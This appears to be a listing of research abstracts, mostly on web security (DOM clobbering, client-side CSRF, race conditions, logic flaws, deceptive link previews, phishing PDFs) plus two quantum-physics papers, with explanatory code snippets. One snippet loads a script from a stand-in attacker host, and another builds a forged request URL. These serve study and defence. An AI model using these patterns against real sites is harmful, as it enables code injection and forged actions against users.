127 research outputs found

    Analysis of quantum phase transition in some different Curie-Weiss models: a unified approach

    Full text link
    A unified approach to the analysis of quantum phase transitions in some different Curie-Weiss models is proposed such that they are treated and analyzed under the same general scheme. This approach takes three steps: balancing the quantum Hamiltonian by an appropriate factor, rewriting the Hamiltonian in terms of SU(2) operators only, and obtaining a classical Hamiltonian. The SU(2) operators are obtained from creation and annihilation operators as linear combinations in the case of fermions and via an inverse Holstein-Primakoff transformation in the case of bosons. This scheme is successfully applied to the Lipkin, pairing, Jaynes-Cummings, bilayer, and Heisenberg models. Comment: 24 pages, 6 figures, submitted for publication on August 29, 2017. Some errors concerning the Jaynes-Cummings model need to be fixed.
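
    For reference, a standard form of the Holstein-Primakoff transformation, which maps spin-S operators onto a single bosonic mode (conventions may differ from the paper's); the inverse map used here expresses a and a^\dagger through the SU(2) generators instead:

        \[ S_z = S - a^\dagger a, \qquad
           S_+ = \sqrt{2S}\,\sqrt{1 - \frac{a^\dagger a}{2S}}\; a, \qquad
           S_- = (S_+)^\dagger . \]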

    Application of an inverse Holstein-Primakoff transformation to the Jaynes-Cummings model

    Full text link
    A modification of the Holstein-Primakoff transformation is proposed such that creation and annihilation operators for a bosonic field are rewritten as operators of an SU(2) algebra. Once it is applied to a quantum Hamiltonian, a subsequent application of Lieb's prescription for the classical limit of spin operators allows one to efficiently write a classical Hamiltonian for the system. This process is illustrated for the M-atom Jaynes-Cummings model. Comment: 11 pages, 3 figures, English version of the work published in Anais do XX ENMC -- Encontro Nacional de Modelagem Computacional e VIII ECTM -- Encontro de Ciências e Tecnologia de Materiais, Nova Friburgo, RJ, 16-19 October 2017. Some errors concerning the Jaynes-Cummings model need to be fixed.
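
    As context, the single-atom Jaynes-Cummings Hamiltonian in the rotating-wave approximation reads (with ħ = 1; the M-atom case replaces the Pauli operators by collective SU(2) operators, and the paper's conventions may differ):

        \[ H = \omega\, a^\dagger a + \frac{\omega_0}{2}\,\sigma_z + g\left(a\,\sigma_+ + a^\dagger\,\sigma_-\right), \]

    while Lieb's prescription replaces the spin operators by their classical limits, e.g. \( S_z \to S\cos\theta \) and \( S_\pm \to S\,e^{\pm i\varphi}\sin\theta \).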

    Deceptive Previews: A Study of the Link Preview Trustworthiness in Social Platforms

    Get PDF
    Social media has become a primary means of content and information sharing, thanks to its speed and simplicity. In this scenario, link previews play the important role of giving users a meaningful first glance, summarizing the content of the shared webpage in a title, description, and image. In our work, we analyzed the preview-rendering process and observed how it can be misused to obtain benign-looking previews for malicious links. Concrete use cases of this research are phishing and spam spread, considering targeted attacks in addition to large-scale campaigns. We designed a set of experiments for 20 social media platforms, including social networks and instant messaging applications, and found that most platforms follow their own preview design and format, sometimes providing only partial information. Four of these platforms allow preview crafting so as to hide the malicious target even from a tech-savvy user, and we found that it is possible to create misleading previews for the remaining 16 platforms when an attacker can register their own domain. We also observe that 18 social media platforms employ neither active nor passive countermeasures against the spread of known malicious links or software, and that existing cross-checks on malicious URLs can be bypassed through client- and server-side redirections. To conclude, we suggest seven recommendations covering the spectrum of our findings to improve the overall preview-rendering mechanism and increase users' trust in social media platforms.
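
    To make the preview-rendering pipeline concrete, the following TypeScript sketch (Node 18+ for the built-in fetch; the URL is a placeholder, and real platforms apply their own parsing and fallbacks) extracts the Open Graph tags that many platforms consult when building a preview. Since these tags are fully controlled by the page author, a malicious page can advertise an arbitrary benign-looking title, description, and image:

        // Naive Open Graph extraction, roughly what a preview renderer consults.
        async function fetchPreview(url: string) {
          const html = await (await fetch(url)).text();
          const og = (prop: string) =>
            html.match(new RegExp(`<meta[^>]+property="og:${prop}"[^>]+content="([^"]*)"`, 'i'))?.[1];
          return {
            title: og('title'),             // attacker-controlled
            description: og('description'), // attacker-controlled
            image: og('image'),             // attacker-controlled
          };
        }

        fetchPreview('https://example.com/').then(console.log);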

    Raccoon: Automated Verification of Guarded Race Conditions in Web Applications

    Get PDF
    Web applications are distributed, asynchronous applications that can span multiple concurrent processes. They are intended to be used by a large number of users at the same time. As concurrent applications, web applications have to account for race conditions that may occur when database accesses happen concurrently. Unlike vulnerability classes such as XSS or SQL injection, DBMS-based race condition flaws have received little attention even though their impact is potentially severe. In this paper, we present Raccoon, an automated approach to detect and verify race condition vulnerabilities in web applications. Raccoon identifies potential race conditions by interleaving the execution of user traces while tightly monitoring the resulting database activity. Based on our methodology, we create a proof-of-concept implementation. We test four different web applications and ten use cases and discover six race conditions with security implications. Raccoon requires neither security expertise nor knowledge about the implementation or database layout, and it reports only vulnerabilities for which the tool was able to successfully replicate a practical attack. Thus, Raccoon complements previous approaches that did not verify detected possible vulnerabilities.
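
    The class of flaws targeted here can be illustrated with a minimal check-then-act pattern; the TypeScript sketch below uses an in-memory store standing in for the DBMS and hypothetical names, and is not Raccoon itself. Two interleaved requests both pass the guard before either one records the redemption, so a single-use coupon is applied twice:

        // Guarded race condition: the guard (read) and the update (write) are not
        // executed atomically, so concurrent requests can interleave between them.
        const redeemed = new Set<string>();          // stands in for a database table

        async function redeemCoupon(code: string, user: string): Promise<boolean> {
          if (redeemed.has(code)) return false;      // guard: "is it still unused?"
          await new Promise(r => setTimeout(r, 10)); // I/O latency between check and write
          redeemed.add(code);                        // act: mark as used, grant discount
          console.log(`${user} redeemed ${code}`);
          return true;
        }

        // Two concurrent requests: both pass the guard, both get the discount.
        Promise.all([redeemCoupon('SAVE10', 'alice'), redeemCoupon('SAVE10', 'mallory')])
          .then(results => console.log(results));    // [true, true] instead of [true, false]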

    It's (DOM) Clobbering Time: Attack Techniques, Prevalence, and Defenses

    Get PDF
    DOM Clobbering is a type of code-less injection attack in which attackers insert a piece of non-script, seemingly benign HTML markup into a webpage and transform it into executable code by exploiting unforeseen interactions between JavaScript code and the runtime environment. The attack techniques, browser behaviours, and vulnerable code patterns that enable DOM Clobbering have not been studied yet, and in this paper we undertake one of the first evaluations of the state of DOM Clobbering on the Web platform. Starting with a comprehensive survey of existing literature and dynamic analysis of 19 different mobile and desktop browsers, we systematize DOM Clobbering attacks, uncovering 31.4K distinct markups that use five different techniques to unexpectedly overwrite JavaScript variables in at least one browser. Then, we use our systematization to identify and characterize program instructions that can be overwritten by DOM Clobbering, and use it to present TheThing, an automated system that detects clobberable data flows to security-sensitive instructions. We instantiate TheThing on the Tranco top 5K sites, quantifying the prevalence and impact of DOM Clobbering in the wild. Our evaluation uncovers that DOM Clobbering vulnerabilities are ubiquitous, with a total of 9,467 vulnerable data flows across 491 affected sites, making it possible to mount arbitrary code execution, open redirection, or client-side request forgery attacks against popular websites such as Fandom, Trello, Vimeo, TripAdvisor, WikiBooks, and GitHub that were not exploitable through traditional attack vectors. Finally, we also evaluate the robustness of existing countermeasures, such as HTML sanitizers and Content Security Policy, against DOM Clobbering.
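
    A minimal TypeScript sketch (browser context, DOM lib; variable and endpoint names are hypothetical) of one well-known clobbering technique rather than the paper's full systematization: an element's id becomes a named property on window, and an anchor's string conversion yields its href, so script-less markup can redirect a script-loading sink:

        // Attacker-injected, non-script markup (e.g., it survives an HTML sanitizer):
        document.body.insertAdjacentHTML(
          'beforeend',
          '<a id="defaultConfigUrl" href="https://attacker.example/payload.js"></a>',
        );

        // Vulnerable pattern: the code falls back to a global it expects to be absent
        // or set by trusted code; the clobbered named property shadows that global.
        const w = window as unknown as { defaultConfigUrl?: unknown };
        const url = String(w.defaultConfigUrl ?? '/static/config.js'); // attacker URL wins

        const s = document.createElement('script');
        s.src = url;                        // code-less markup became code execution
        document.head.appendChild(s);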

    Toward Black-Box Detection of Logic Flaws in Web Applications

    Full text link
    Web applications play a very important role in many critical areas, including online banking, health care, and personal communication. This, combined with the limited security training of many web developers, makes web applications one of the most common targets for attackers. In the past, researchers have proposed a large number of white- and black-box techniques to test web applications for the presence of several classes of vulnerabilities. However, traditional approaches focus mostly on the detection of input validation flaws, such as SQL injection and cross-site scripting. Unfortunately, logic vulnerabilities specific to particular applications remain outside the scope of most existing tools and still need to be discovered by manual inspection. In this paper we propose a novel black-box technique to detect logic vulnerabilities in web applications. Our approach is based on the automatic identification of a number of behavioral patterns starting from a few network traces in which users interact with a certain application. Based on the extracted model, we then generate targeted test cases following a number of common attack scenarios. We applied our prototype to seven real-world e-commerce web applications, discovering ten very severe and previously unknown logic vulnerabilities.
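
    One attack scenario such black-box approaches commonly exercise is workflow bypass: replay a recorded trace with a step removed and check whether the application still completes the transaction. The TypeScript sketch below illustrates that idea only; the endpoint paths and the test-generation helper are hypothetical and not the paper's implementation:

        // A recorded user trace: the request sequence of a legitimate purchase.
        type Step = { method: 'GET' | 'POST'; path: string };
        const trace: Step[] = [
          { method: 'POST', path: '/cart/add' },
          { method: 'POST', path: '/checkout/pay' },      // the security-relevant step
          { method: 'POST', path: '/checkout/confirm' },
        ];

        // Generate "step-skipping" test cases: drop one step at a time and replay.
        function stepSkippingTests(t: Step[]): Step[][] {
          return t.map((_, i) => t.filter((_, j) => j !== i));
        }

        // If replaying the trace without /checkout/pay still yields a confirmed
        // order, the application fails to enforce its own workflow (a logic flaw).
        for (const testCase of stepSkippingTests(trace)) {
          console.log(testCase.map(s => s.path).join(' -> '));
        }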

    JAW: Studying Client-side CSRF with Hybrid Property Graphs and Declarative Traversals

    Get PDF
    Client-side CSRF is a new type of CSRF vulnerability in which the adversary can trick the client-side JavaScript program into sending a forged HTTP request to a vulnerable target site by modifying the program's input parameters. We have little to no knowledge of this new vulnerability, and exploratory security evaluations of JavaScript-based web applications are impeded by the scarcity of reliable and scalable testing techniques. This paper presents JAW, a framework that enables the analysis of modern web applications against client-side CSRF, leveraging declarative traversals on hybrid property graphs, a canonical, hybrid model for JavaScript programs. We use JAW to evaluate the prevalence of client-side CSRF vulnerabilities among all (i.e., 106) web applications from the Bitnami catalog, covering over 228M lines of JavaScript code. Our approach uncovers 12,701 forgeable client-side requests affecting 87 web applications in total. For 203 forgeable requests, we successfully created client-side CSRF exploits against seven web applications that can execute arbitrary server-side state-changing operations or enable cross-site scripting and SQL injection, which are not reachable via the classical attack vectors. Finally, we analyzed the forgeable requests and identified 25 request templates, highlighting the fields that can be manipulated and the type of manipulation.
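
    The vulnerable pattern behind client-side CSRF can be sketched in a few lines of TypeScript (browser context; the parameter and endpoint names are hypothetical, not taken from the paper): the page derives a request target from an input the attacker can influence, here the URL fragment, and sends it with the victim's credentials.

        // Forgeable client-side request: the target comes from attacker-influenceable input.
        const params = new URLSearchParams(location.hash.slice(1));
        const endpoint = params.get('api') ?? '/api/profile/update';   // forgeable field

        fetch(endpoint, {
          method: 'POST',
          credentials: 'include',            // victim's cookies are attached
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({ displayName: params.get('name') ?? '' }),
        });
        // Luring the victim to https://site.example/app#api=/api/admin/delete&name=x
        // turns this benign-looking client-side request into a forged state change.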

    A Large-Scale Study of Phishing PDF Documents

    Full text link
    Phishing PDFs are malicious PDF documents that do not embed malware but trick victims into visiting malicious web pages leading to password theft or drive-by downloads. While recent reports indicate a surge of phishing PDFs, prior works have largely neglected this new threat, positioning phishing PDFs as mere accessories distributed via email phishing campaigns. This paper challenges this belief and presents the first systematic and comprehensive study centered on phishing PDFs. Starting from a real-world dataset, we first identify 44 phishing PDF campaigns via clustering and characterize them by looking at their volumetric, temporal, and visual features. Among these, we identify three large campaigns covering 89% of the dataset, exhibiting significantly different volumetric and temporal properties compared to classical email phishing and relying on web UI elements as visual baits. Finally, we look at the distribution vectors and show that phishing PDFs are not only distributed via attachments but also via SEO attacks, placing phishing PDFs outside the email distribution ecosystem. This paper also assesses the usefulness of the VirusTotal scoring system, showing that phishing PDFs receive considerably low scores, creating a blind spot for organizations. While URL blocklists can help prevent victims from visiting the attack web pages, PDF documents seem not to be subject to any form of content-based filtering or detection.
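
    A first-cut content-based check of the kind this abstract finds missing could simply surface the link annotations embedded in a PDF. The Node/TypeScript sketch below scans the raw file for uncompressed /URI entries; it is a deliberately naive heuristic (it misses URIs inside compressed object streams, and the file path is a placeholder), not a technique from the paper:

        import { readFileSync } from 'node:fs';

        // Extract the targets of uncompressed link annotations (/URI entries).
        function extractPdfUris(path: string): string[] {
          const raw = readFileSync(path).toString('latin1');   // PDFs are byte-oriented
          const uris = [...raw.matchAll(/\/URI\s*\(([^)]+)\)/g)].map(m => m[1]);
          return [...new Set(uris)];
        }

        // A one-page phishing PDF typically carries a single external link that
        // leads to the credential-harvesting page.
        console.log(extractPdfUris('sample.pdf'));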